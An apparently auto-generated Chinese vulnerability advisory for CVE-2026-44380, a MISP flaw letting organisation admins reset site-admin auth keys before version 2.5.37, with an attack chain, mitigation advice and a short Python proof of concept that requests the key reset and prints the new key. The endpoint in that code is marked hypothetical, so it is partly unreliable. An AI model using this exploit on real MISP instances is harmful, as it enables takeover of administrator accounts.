CVE-2026-44380 CVSS 7.2 高危

CVE-2026-44380 MISP认证密钥重置权限提升漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44380

漏洞类型

权限提升

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

MISP

漏洞概述

MISP是一个开源威胁情报共享平台。在2.5.37版本之前，其认证密钥重置功能存在不正确的访问控制漏洞。该漏洞允许已认证的组织管理员重置同一组织内站点管理员账户的认证密钥。攻击者可利用此缺陷获取高权限账户的密钥，从而成功将权限提升至站点管理员级别，造成严重的安全威胁，可能导致系统被完全控制。

技术细节

该漏洞核心在于MISP平台认证密钥重置功能的访问控制机制失效。在2.5.37之前的版本中，虽然区分了组织管理员和站点管理员的角色，但在处理密钥重置请求时，后端代码未对目标账户的权限级别进行有效校验。攻击者只需具备组织管理员权限，即可针对同一组织内的站点管理员账户发起密钥重置操作。系统会生成一个新的API认证密钥并返回给攻击者。由于该密钥属于高权限账户，攻击者可利用它通过API接口或直接登录Web界面，完全接管站点管理员账户，实现从组织管理员到站点管理员的垂直权限提升。这种漏洞利用无需用户交互，且成功后可导致机密性、完整性和可用性的全面受损。

攻击链分析

STEP 1

步骤1：获取初始权限

攻击者获取MISP平台中一个组织管理员账户的凭证。

STEP 2

步骤2：利用漏洞

攻击者使用组织管理员权限，调用密钥重置接口，针对同组织内的站点管理员账户发送重置请求。

STEP 3

步骤3：获取高权限凭据

系统返回站点管理员账户的新生成的认证密钥，攻击者获取该密钥。

STEP 4

步骤4：权限提升

攻击者使用获取的高权限密钥登录系统，获得站点管理员权限，从而完全控制平台。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target MISP instance URL
target_url = "https://misp.example.com"

# Attacker's Org Admin API key
api_key = "ATTACKER_ORG_ADMIN_KEY"

# ID of the Site Admin account to target
target_user_id = "1"

headers = {
    "Authorization": api_key,
    "Accept": "application/json",
    "Content-Type": "application/json"
}

# Endpoint to reset auth key (Hypothetical based on MISP API structure)
endpoint = f"{target_url}/users/resetAuthKey/{target_user_id}"

# Send the request
try:
    response = requests.post(endpoint, headers=headers)
    if response.status_code == 200:
        print("[+] Auth key reset successful.")
        print("[+] New Auth Key:", response.json().get('User', {}).get('authkey'))
    else:
        print("[-] Failed to reset auth key.")
        print(response.text)
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

MISP < 2.5.37

防御指南

临时缓解措施

建议立即升级至修复版本2.5.37。若无法立即升级，应严格监控组织管理员的操作日志，特别关注针对站点管理员账户的密钥重置行为，并暂时收回非必要的组织管理员权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表